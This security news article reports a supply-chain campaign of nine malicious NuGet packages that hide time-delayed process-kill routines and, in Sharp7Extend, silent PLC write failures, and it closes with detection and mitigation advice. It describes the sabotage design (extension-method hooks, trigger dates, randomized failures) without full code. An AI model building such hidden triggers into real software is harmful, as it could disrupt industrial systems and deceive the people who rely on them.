Malicious NuGet Packages Embed Time-Delayed Sabotage Code

Researchers at Socket have uncovered a complex supply-chain attack involving nine malicious NuGet packages that incorporate time-delayed sabotage routines into legitimate .NET libraries. These packages, which were downloaded 9,488 times before their discovery, have the capability to execute hidden triggers that can abruptly terminate host processes and, in one instance, corrupt operations within industrial control systems.

The Malicious Packages and Their Functionality

The packages, published under the alias shanhai666 between 2023 and 2024, provide authentic functionality to gain user trust and evade initial scrutiny. Each package contains approximately 20 lines of malicious code embedded within a larger body of legitimate code. This strategy allows the actor to exploit C# extension methods, such as .Exec() for database commands and .BeginTran() for S7 PLC clients, which ensures that any database query or PLC operation automatically executes the embedded malicious logic.

The payloads are designed to activate based on hardcoded or encrypted trigger dates. After a specified date, the code computes a random number and calls Process.GetCurrentProcess().Kill(), leading to an abrupt termination of the application. Notably, some packages have trigger dates set for 2027 or 2028, extending the time frame for the attackers to exploit unsuspecting users before detection occurs.

One of the most dangerous packages identified in this campaign, Sharp7Extend, combines two distinct sabotage mechanisms. The first is an immediate probabilistic process-kill triggered on every PLC operation, active until June 6, 2028. The second is a deferred write-failure mechanism that silently returns failed results for up to 80% of write attempts after a delay of 30 to 90 minutes. This behavior can lead to corrupted PLC writes without displaying any obvious error messages, increasing the risk of actuator non-responses and undetected production drift, which could be mistaken for hardware malfunctions.

Challenges in Detection

The detection of these malicious packages is complicated by various factors. Most of the code remains legitimate and functional, which allows it to pass standard testing and code reviews. Additionally, the technique known as typosquatting, where malicious packages are named similarly to legitimate ones (e.g., Sharp7 vs. Sharp7Extend), further increases the risk of accidental installations in operational technology (OT) environments.

Moreover, the integration of legitimate libraries conceals potential red flags during testing phases. The randomized activation of the malicious logic disguises systematic interference as random failures, complicating the identification of the attack. Delays between installation and activation disrupt forensic timelines, making it difficult to trace back the impacts when they are eventually observed. The attacker has also varied author metadata and forged signature artifacts to hinder automated detection methods.

To combat this sophisticated campaign, organizations must adopt both immediate and long-term strategies to bolster supply chain resilience. Key actions include auditing dependencies to identify and remove any of the nine malicious packages, enforcing strict dependency hygiene, and integrating software bill of materials (SBOM) checks along with static analysis into continuous integration and continuous deployment (CI/CD) pipelines.

Monitoring for time-based logic and unusual usage of Process.Kill() and extension methods is also vital. For industrial environments, implementing write verification for PLC commands, establishing baseline PLC success rates, and monitoring for sudden drops in write confirmations are recommended practices.

By adopting these measures, organizations can enhance their software supply chain security and mitigate the risk posed by hidden malicious logic. This campaign serves as a stark reminder of how supply-chain attacks can weaponize trusted code and utilize time delays to inflict significant damage while remaining undetected.